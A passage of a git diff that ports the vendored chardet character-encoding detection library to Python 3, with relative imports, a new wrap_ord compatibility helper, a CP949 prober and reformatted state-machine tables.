-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants -from euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO -from euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO -from gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO -from big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO -from jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO +from .euctwfreq import (EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, + EUCTW_TYPICAL_DISTRIBUTION_RATIO) +from .euckrfreq import (EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, + EUCKR_TYPICAL_DISTRIBUTION_RATIO) +from .gb2312freq import (GB2312CharToFreqOrder, GB2312_TABLE_SIZE, + GB2312_TYPICAL_DISTRIBUTION_RATIO) +from .big5freq import (Big5CharToFreqOrder, BIG5_TABLE_SIZE, + BIG5_TYPICAL_DISTRIBUTION_RATIO) +from .jisfreq import (JISCharToFreqOrder, JIS_TABLE_SIZE, + JIS_TYPICAL_DISTRIBUTION_RATIO) +from .compat import wrap_ord ENOUGH_DATA_THRESHOLD = 1024 SURE_YES = 0.99 SURE_NO = 0.01 +MINIMUM_DATA_THRESHOLD = 3 + class CharDistributionAnalysis: def __init__(self): - self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder()) - self._mTableSize = None # Size of above table - self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail. 
+ # Mapping table to get frequency order from char order (get from + # GetOrder()) + self._mCharToFreqOrder = None + self._mTableSize = None # Size of above table + # This is a constant value which varies from language to language, + # used in calculating confidence. See + # http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html + # for further detail. + self._mTypicalDistributionRatio = None self.reset() def reset(self): """reset analyser, clear any state""" - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made - self._mTotalChars = 0 # Total characters encountered - self._mFreqChars = 0 # The number of characters whose frequency order is less than 512 + # If this flag is set to True, detection is done and conclusion has + # been made + self._mDone = False + self._mTotalChars = 0 # Total characters encountered + # The number of characters whose frequency order is less than 512 + self._mFreqChars = 0 - def feed(self, aStr, aCharLen): + def feed(self, aBuf, aCharLen): """feed a character with known length""" if aCharLen == 2: # we only care about 2-bytes character in our distribution analysis - order = self.get_order(aStr) + order = self.get_order(aBuf) else: order = -1 if order >= 0: @@ -65,12 +81,14 @@ class CharDistributionAnalysis: def get_confidence(self): """return confidence based on existing data""" - # if we didn't receive any character in our consideration range, return negative answer - if self._mTotalChars <= 0: + # if we didn't receive any character in our consideration range, + # return negative answer + if self._mTotalChars <= 0 or self._mFreqChars <= MINIMUM_DATA_THRESHOLD: return SURE_NO if self._mTotalChars != self._mFreqChars: - r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio) + r = (self._mFreqChars / ((self._mTotalChars - self._mFreqChars) + * self._mTypicalDistributionRatio)) if r < SURE_YES: return r @@ -78,16 +96,18 
@@ class CharDistributionAnalysis: return SURE_YES def got_enough_data(self): - # It is not necessary to receive all data to draw conclusion. For charset detection, - # certain amount of data is enough + # It is not necessary to receive all data to draw conclusion. + # For charset detection, certain amount of data is enough return self._mTotalChars > ENOUGH_DATA_THRESHOLD - def get_order(self, aStr): - # We do not handle characters based on the original encoding string, but - # convert this encoding string to a number, here called order. - # This allows multiple encodings of a language to share one frequency table. + def get_order(self, aBuf): + # We do not handle characters based on the original encoding string, + # but convert this encoding string to a number, here called order. + # This allows multiple encodings of a language to share one frequency + # table. return -1 + class EUCTWDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -95,16 +115,18 @@ class EUCTWDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = EUCTW_TABLE_SIZE self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-TW encoding, we are interested + def get_order(self, aBuf): + # for euc-TW encoding, we are interested # first byte range: 0xc4 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. 
State machine has done that - if aStr[0] >= '\xC4': - return 94 * (ord(aStr[0]) - 0xC4) + ord(aStr[1]) - 0xA1 + first_char = wrap_ord(aBuf[0]) + if first_char >= 0xC4: + return 94 * (first_char - 0xC4) + wrap_ord(aBuf[1]) - 0xA1 else: return -1 + class EUCKRDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -112,15 +134,17 @@ class EUCKRDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = EUCKR_TABLE_SIZE self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-KR encoding, we are interested + def get_order(self, aBuf): + # for euc-KR encoding, we are interested # first byte range: 0xb0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xB0': - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 + first_char = wrap_ord(aBuf[0]) + if first_char >= 0xB0: + return 94 * (first_char - 0xB0) + wrap_ord(aBuf[1]) - 0xA1 else: - return -1; + return -1 + class GB2312DistributionAnalysis(CharDistributionAnalysis): def __init__(self): @@ -129,15 +153,17 @@ class GB2312DistributionAnalysis(CharDistributionAnalysis): self._mTableSize = GB2312_TABLE_SIZE self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for GB2312 encoding, we are interested + def get_order(self, aBuf): + # for GB2312 encoding, we are interested # first byte range: 0xb0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. 
State machine has done that - if (aStr[0] >= '\xB0') and (aStr[1] >= '\xA1'): - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if (first_char >= 0xB0) and (second_char >= 0xA1): + return 94 * (first_char - 0xB0) + second_char - 0xA1 else: - return -1; + return -1 + class Big5DistributionAnalysis(CharDistributionAnalysis): def __init__(self): @@ -146,19 +172,21 @@ class Big5DistributionAnalysis(CharDistributionAnalysis): self._mTableSize = BIG5_TABLE_SIZE self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for big5 encoding, we are interested + def get_order(self, aBuf): + # for big5 encoding, we are interested # first byte range: 0xa4 -- 0xfe # second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xA4': - if aStr[1] >= '\xA1': - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0xA1 + 63 + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if first_char >= 0xA4: + if second_char >= 0xA1: + return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63 else: - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0x40 + return 157 * (first_char - 0xA4) + second_char - 0x40 else: return -1 + class SJISDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -166,22 +194,24 @@ class SJISDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = JIS_TABLE_SIZE self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for sjis encoding, we are interested + def get_order(self, aBuf): + # for sjis encoding, we are interested # first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe # second byte range: 0x40 -- 0x7e, 0x81 -- oxfe # no validation needed here. 
State machine has done that - if (aStr[0] >= '\x81') and (aStr[0] <= '\x9F'): - order = 188 * (ord(aStr[0]) - 0x81) - elif (aStr[0] >= '\xE0') and (aStr[0] <= '\xEF'): - order = 188 * (ord(aStr[0]) - 0xE0 + 31) + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if (first_char >= 0x81) and (first_char <= 0x9F): + order = 188 * (first_char - 0x81) + elif (first_char >= 0xE0) and (first_char <= 0xEF): + order = 188 * (first_char - 0xE0 + 31) else: - return -1; - order = order + ord(aStr[1]) - 0x40 - if aStr[1] > '\x7F': - order =- 1 + return -1 + order = order + second_char - 0x40 + if second_char > 0x7F: + order = -1 return order + class EUCJPDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -189,12 +219,13 @@ class EUCJPDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = JIS_TABLE_SIZE self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-JP encoding, we are interested + def get_order(self, aBuf): + # for euc-JP encoding, we are interested # first byte range: 0xa0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xA0': - return 94 * (ord(aStr[0]) - 0xA1) + ord(aStr[1]) - 0xa1 + char = wrap_ord(aBuf[0]) + if char >= 0xA0: + return 94 * (char - 0xA1) + wrap_ord(aBuf[1]) - 0xa1 else: return -1 diff --git a/thirdparty/chardet/charsetgroupprober.py b/thirdparty/chardet/charsetgroupprober.py index 9037af480..85e7a1c67 100644 --- a/thirdparty/chardet/charsetgroupprober.py +++ b/thirdparty/chardet/charsetgroupprober.py @@ -25,8 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetprober import CharSetProber +from . 
import constants +import sys +from .charsetprober import CharSetProber + class CharSetGroupProber(CharSetProber): def __init__(self): @@ -41,28 +43,32 @@ class CharSetGroupProber(CharSetProber): for prober in self._mProbers: if prober: prober.reset() - prober.active = constants.True + prober.active = True self._mActiveNum += 1 self._mBestGuessProber = None def get_charset_name(self): if not self._mBestGuessProber: self.get_confidence() - if not self._mBestGuessProber: return None + if not self._mBestGuessProber: + return None # self._mBestGuessProber = self._mProbers[0] return self._mBestGuessProber.get_charset_name() def feed(self, aBuf): for prober in self._mProbers: - if not prober: continue - if not prober.active: continue + if not prober: + continue + if not prober.active: + continue st = prober.feed(aBuf) - if not st: continue + if not st: + continue if st == constants.eFoundIt: self._mBestGuessProber = prober return self.get_state() elif st == constants.eNotMe: - prober.active = constants.False + prober.active = False self._mActiveNum -= 1 if self._mActiveNum <= 0: self._mState = constants.eNotMe @@ -78,18 +84,22 @@ class CharSetGroupProber(CharSetProber): bestConf = 0.0 self._mBestGuessProber = None for prober in self._mProbers: - if not prober: continue + if not prober: + continue if not prober.active: if constants._debug: - sys.stderr.write(prober.get_charset_name() + ' not active\n') + sys.stderr.write(prober.get_charset_name() + + ' not active\n') continue cf = prober.get_confidence() if constants._debug: - sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf)) + sys.stderr.write('%s confidence = %s\n' % + (prober.get_charset_name(), cf)) if bestConf < cf: bestConf = cf self._mBestGuessProber = prober - if not self._mBestGuessProber: return 0.0 + if not self._mBestGuessProber: + return 0.0 return bestConf # else: # self._mBestGuessProber = self._mProbers[0] diff --git a/thirdparty/chardet/charsetprober.py 
b/thirdparty/chardet/charsetprober.py index 6ad198cd4..97581712c 100644 --- a/thirdparty/chardet/charsetprober.py +++ b/thirdparty/chardet/charsetprober.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Universal charset detector code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 2001 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # Shy Shalom - original C code @@ -14,19 +14,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, re +from . 
import constants +import re + class CharSetProber: def __init__(self): @@ -48,11 +50,11 @@ class CharSetProber: return 0.0 def filter_high_bit_only(self, aBuf): - aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf) + aBuf = re.sub(b'([\x00-\x7F])+', b' ', aBuf) return aBuf def filter_without_english_letters(self, aBuf): - aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf) + aBuf = re.sub(b'([A-Za-z])+', b' ', aBuf) return aBuf def filter_with_english_letters(self, aBuf): diff --git a/thirdparty/chardet/codingstatemachine.py b/thirdparty/chardet/codingstatemachine.py index 452d3b0a0..8dd8c9179 100644 --- a/thirdparty/chardet/codingstatemachine.py +++ b/thirdparty/chardet/codingstatemachine.py @@ -13,19 +13,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart +from .compat import wrap_ord + class CodingStateMachine: def __init__(self, sm): @@ -40,12 +42,15 @@ class CodingStateMachine: def next_state(self, c): # for each byte we get its class # if it is first byte, we also get byte length - byteCls = self._mModel['classTable'][ord(c)] + # PY3K: aBuf is a byte stream, so c is an int, not a byte + byteCls = self._mModel['classTable'][wrap_ord(c)] if self._mCurrentState == eStart: self._mCurrentBytePos = 0 self._mCurrentCharLen = self._mModel['charLenTable'][byteCls] # from byte's class and stateTable, we get its next state - self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls] + curr_state = (self._mCurrentState * self._mModel['classFactor'] + + byteCls) + self._mCurrentState = self._mModel['stateTable'][curr_state] self._mCurrentBytePos += 1 return self._mCurrentState diff --git a/thirdparty/chardet/compat.py b/thirdparty/chardet/compat.py new file mode 100644 index 000000000..d9e30addf --- /dev/null +++ b/thirdparty/chardet/compat.py @@ -0,0 +1,34 @@ +######################## BEGIN LICENSE BLOCK ######################## +# Contributor(s): +# Ian Cordasco - port to Python +# +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. 
+# +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA +# 02110-1301 USA +######################### END LICENSE BLOCK ######################### + +import sys + + +if sys.version_info < (3, 0): + base_str = (str, unicode) +else: + base_str = (bytes, str) + + +def wrap_ord(a): + if sys.version_info < (3, 0) and isinstance(a, base_str): + return ord(a) + else: + return a diff --git a/thirdparty/chardet/constants.py b/thirdparty/chardet/constants.py index e94e226b0..e4d148b3c 100644 --- a/thirdparty/chardet/constants.py +++ b/thirdparty/chardet/constants.py @@ -37,11 +37,3 @@ eError = 1 eItsMe = 2 SHORTCUT_THRESHOLD = 0.95 - -import __builtin__ -if not hasattr(__builtin__, 'False'): - False = 0 - True = 1 -else: - False = __builtin__.False - True = __builtin__.True diff --git a/thirdparty/chardet/cp949prober.py b/thirdparty/chardet/cp949prober.py new file mode 100644 index 000000000..ff4272f82 --- /dev/null +++ b/thirdparty/chardet/cp949prober.py @@ -0,0 +1,44 @@ +######################## BEGIN LICENSE BLOCK ######################## +# The Original Code is mozilla.org code. +# +# The Initial Developer of the Original Code is +# Netscape Communications Corporation. +# Portions created by the Initial Developer are Copyright (C) 1998 +# the Initial Developer. All Rights Reserved. 
+# +# Contributor(s): +# Mark Pilgrim - port to Python +# +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA +# 02110-1301 USA +######################### END LICENSE BLOCK ######################### + +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCKRDistributionAnalysis +from .mbcssm import CP949SMModel + + +class CP949Prober(MultiByteCharSetProber): + def __init__(self): + MultiByteCharSetProber.__init__(self) + self._mCodingSM = CodingStateMachine(CP949SMModel) + # NOTE: CP949 is a superset of EUC-KR, so the distribution should be + # not different. + self._mDistributionAnalyzer = EUCKRDistributionAnalysis() + self.reset() + + def get_charset_name(self): + return "CP949" diff --git a/thirdparty/chardet/escprober.py b/thirdparty/chardet/escprober.py index c2e979e7b..80a844ff3 100644 --- a/thirdparty/chardet/escprober.py +++ b/thirdparty/chardet/escprober.py @@ -13,39 +13,43 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. 
-# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine +from . import constants +from .escsm import (HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, + ISO2022KRSMModel) +from .charsetprober import CharSetProber +from .codingstatemachine import CodingStateMachine +from .compat import wrap_ord + class EscCharSetProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) - self._mCodingSM = [ \ + self._mCodingSM = [ CodingStateMachine(HZSMModel), CodingStateMachine(ISO2022CNSMModel), CodingStateMachine(ISO2022JPSMModel), CodingStateMachine(ISO2022KRSMModel) - ] + ] self.reset() def reset(self): CharSetProber.reset(self) for codingSM in self._mCodingSM: - if not codingSM: continue - codingSM.active = constants.True + if not codingSM: + continue + codingSM.active = True codingSM.reset() self._mActiveSM = len(self._mCodingSM) self._mDetectedCharset = None @@ -61,19 +65,22 @@ class EscCharSetProber(CharSetProber): def feed(self, aBuf): for c in aBuf: + # PY3K: aBuf is a byte array, so c is an int, not a byte for codingSM in self._mCodingSM: - if not codingSM: continue - if not codingSM.active: continue - codingState = codingSM.next_state(c) + if not codingSM: + continue + if not codingSM.active: + continue + codingState = codingSM.next_state(wrap_ord(c)) if codingState == 
constants.eError: - codingSM.active = constants.False + codingSM.active = False self._mActiveSM -= 1 if self._mActiveSM <= 0: self._mState = constants.eNotMe return self.get_state() elif codingState == constants.eItsMe: self._mState = constants.eFoundIt - self._mDetectedCharset = codingSM.get_coding_state_machine() + self._mDetectedCharset = codingSM.get_coding_state_machine() # nopep8 return self.get_state() return self.get_state() diff --git a/thirdparty/chardet/escsm.py b/thirdparty/chardet/escsm.py index 9fa22952e..bd302b4c6 100644 --- a/thirdparty/chardet/escsm.py +++ b/thirdparty/chardet/escsm.py @@ -13,62 +13,62 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart, eError, eItsMe -HZ_cls = ( \ -1,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,0,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,4,0,5,2,0, # 78 - 7f -1,1,1,1,1,1,1,1, # 80 - 87 -1,1,1,1,1,1,1,1, # 88 - 8f -1,1,1,1,1,1,1,1, # 90 - 97 -1,1,1,1,1,1,1,1, # 98 - 9f -1,1,1,1,1,1,1,1, # a0 - a7 -1,1,1,1,1,1,1,1, # a8 - af -1,1,1,1,1,1,1,1, # b0 - b7 -1,1,1,1,1,1,1,1, # b8 - bf -1,1,1,1,1,1,1,1, # c0 - c7 -1,1,1,1,1,1,1,1, # c8 - cf -1,1,1,1,1,1,1,1, # d0 - d7 -1,1,1,1,1,1,1,1, # d8 - df -1,1,1,1,1,1,1,1, # e0 - e7 -1,1,1,1,1,1,1,1, # e8 - ef -1,1,1,1,1,1,1,1, # f0 - f7 -1,1,1,1,1,1,1,1, # f8 - ff +HZ_cls = ( +1,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,0,0,0,0, # 20 - 27 +0,0,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,0,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,4,0,5,2,0, # 78 - 7f +1,1,1,1,1,1,1,1, # 80 - 87 +1,1,1,1,1,1,1,1, # 88 - 8f +1,1,1,1,1,1,1,1, # 90 - 97 +1,1,1,1,1,1,1,1, # 98 - 9f +1,1,1,1,1,1,1,1, # a0 - a7 +1,1,1,1,1,1,1,1, # a8 - af +1,1,1,1,1,1,1,1, # b0 - b7 +1,1,1,1,1,1,1,1, # b8 - bf +1,1,1,1,1,1,1,1, # c0 
- c7 +1,1,1,1,1,1,1,1, # c8 - cf +1,1,1,1,1,1,1,1, # d0 - d7 +1,1,1,1,1,1,1,1, # d8 - df +1,1,1,1,1,1,1,1, # e0 - e7 +1,1,1,1,1,1,1,1, # e8 - ef +1,1,1,1,1,1,1,1, # f0 - f7 +1,1,1,1,1,1,1,1, # f8 - ff ) -HZ_st = ( \ -eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 - 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f - 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 - 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f +HZ_st = ( +eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f +eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 + 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f + 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 + 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f ) HZCharLenTable = (0, 0, 0, 0, 0, 0) @@ -79,50 +79,50 @@ HZSMModel = {'classTable': HZ_cls, 'charLenTable': HZCharLenTable, 'name': "HZ-GB-2312"} -ISO2022CN_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,3,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,4,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022CN_cls = ( 
+2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,0,0,0,0, # 20 - 27 +0,3,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,4,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022CN_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 - 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 -eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f +ISO2022CN_st = ( +eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 +eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f +eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 +eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 + 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 +eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f ) ISO2022CNCharLenTable = 